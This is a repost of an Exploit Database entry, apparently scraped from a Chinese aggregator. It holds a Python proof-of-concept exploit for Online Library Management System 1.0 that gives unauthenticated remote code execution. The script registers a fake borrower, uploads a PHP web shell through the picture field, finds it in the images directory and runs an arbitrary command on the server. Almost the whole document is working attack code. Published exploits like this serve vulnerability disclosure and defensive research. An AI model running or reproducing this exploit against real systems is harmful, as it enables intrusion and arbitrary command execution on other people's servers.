Online Library Management System 1.0 – Arbitrary File Upload Remote Code Execution (Unauthenticated)

• Exploit Database
• 36 阅读

• 作者： Berk Can Geyikci
  日期： 2021-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50054/

• # Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)
  # Date: 23-06-2021
  # Exploit Author: Berk Can Geyikci
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
  # Version: 1.0
  # Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
  # Exploit Tested Using: Python 3.8.6
  
  '''
  Steps To Produce:
  1)Click Books
  2)Select one book and click Read more
  3)Get the book id from url #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678
  4)Execute Python Script with URL, Book id and Command
  '''
  
  
  '''
  Import required modules:
  '''
  import sys, hashlib, requests
  import urllib
  import time
  import random
  
  try:
  #settings
  target_url = sys.argv[1]
  book_id= sys.argv[2]
  command= sys.argv[3]
  
  except IndexError:
  
  print("- usage: %s <target> <book_id> <command>" % sys.argv[0])
  print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv[0])
  sys.exit()
  
  url = target_url+"/ols/proccess.php?action=add"
  
  session = requests.Session()
  session.get(target_url+"/ols")
  session_cookies = session.cookies
  php_cookie = session.cookies.get_dict()['PHPSESSID'].strip()
  print("Getting Session Cookie= "+php_cookie)
  
  random_borrower_id = random.randint(0,999999)
  
  #Headers to upload php
  headers = {
  "Accept-Encoding": "gzip, deflate",
  "Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/",
  "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq",
  "Upgrade-Insecure-Requests": "1",
  "Connection": "close",
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "Cookie": "PHPSESSID="+php_cookie
  }
  
  req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers)
  
  
  data = "------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n15243678\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BorrowerId\"\r\n\r\n"+str(random_borrower_id)+"\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Firstname\"\r\n\r\ndummy_firstname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Lastname\"\r\n\r\ndummy_lastname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"MiddleName\"\r\n\r\ndummy_middlename\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Address\"\r\n\r\ndummy_address\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"optionsRadios\"\r\n\r\nMale\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"ContactNo\"\r\n\r\n1\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"CourseYear\"\r\n\r\n2021\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BUsername\"\r\n\r\ndummy_username\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BPassword\"\r\n\r\ndummy_\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"picture\"; filename=\"rcepoc_"+str(random_borrower_id)+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\n\r\n\r\n\r\necho shell_exec('"+command+"');\r\n\r\n\r\n\r\n?>\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"save\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq--\r\n"
  
  req = requests.post(url, headers=headers, data=data)
  print("Uploading file...")
  
  req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers)
  #print(req.text)
  
  req = requests.get(target_url+"/ols/borrower/", headers=headers)
  #print(req.text)
  
  req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers)
  reqq = req.text
  #print(reqq)
  reqqq = reqq.find(str(random_borrower_id))
  command_result = reqq[reqqq-21:reqqq+10]
  
  req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers)
  print("Command Result = "+req.text)